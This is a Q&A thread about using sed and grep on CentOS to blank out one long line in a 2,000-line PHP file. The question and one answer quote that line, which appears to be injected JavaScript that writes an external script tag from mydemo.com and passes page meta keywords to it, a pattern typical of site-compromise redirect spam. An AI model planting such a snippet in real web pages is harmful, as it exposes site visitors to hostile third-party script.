# replace a whole line in a file centos

Tags: linux, centos7

I have a script in .php file which is the following :
         `var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('http://mydemo.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<'+'/script>');}`

I would like to replace in cmd line the whole line with (1) empty char. Is it possible? tried to do it with sed , but probably this is a too complex string.Tried to set the string in var , but didn't work either . Has anybody any idea?

Answer (score 0, accepted):

On my OS X i tested this script:

> for strnum in $(grep -n "qwe" test.txt | awk -F ':' '{print $1}'); do cat test.txt | sed -i '.txt' $strnum's/.*/ /' test.txt; done

On CentOS should work this script:

> for strnum in $(grep -n "qwe" test.txt | awk -F ':' '{print $1}'); do cat test.txt | sed -i $strnum's/.*/ /' test.txt; done

You should replace qwe with your pattern. It will replace all strings where pattern would be found to space.

To put right content in grep, it should be prepared. You should create file with required pattern and start command:

> echo '"'$(cat your_file |  sed -e 's|"|\\"|g')'"'

Result of this command should be replaced qwe(with quotes for sure).

You should get something like this:

```
for strnum in $(grep -n "var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+\"//\"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('http://mydemo.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<'+'/script>');}" test.txt | awk -F ':' '{print $1}'); do cat test.txt | sed -i $strnum's/.*/ /' test.txt; done
```

Comment: No ,didn't work. This is not a simple text (string) . It's little (-:) complicated. There are single quotes , doubles quotes , parenthesis , : ., etc .. some of them could match an regular syntax or Character Class for sed .. Maybe sed is not the answer? Can not figure it out...

Comment: **sed** will change only string, which would be found by grep. I update answer, try it.

Comment: Can not understand your 2nd answer. What number should I change? where should I write my whole `code` var a='' ..... /script>');} `code`..@Alexander T

Comment: @user1356820, we'll I tried to find way to do what you want, and found. I'll update answer in 5 minutes.

Answer (score 1):

This is actually something `sed` excels in. :)

```
sed -i '1s/.*/ /' your-file
```

Example:

```
$ cat test
one
two
three
$ sed '1s/.*/ /' < test

two
three
```

Comment: Probably ,haven't stated it correct. The current .php which contains this script has 2000 lines. So I would like to find in this .php files the mentioned    text and replace it

Comment: So, what you want is to replace every line containing only `var ` with empty line?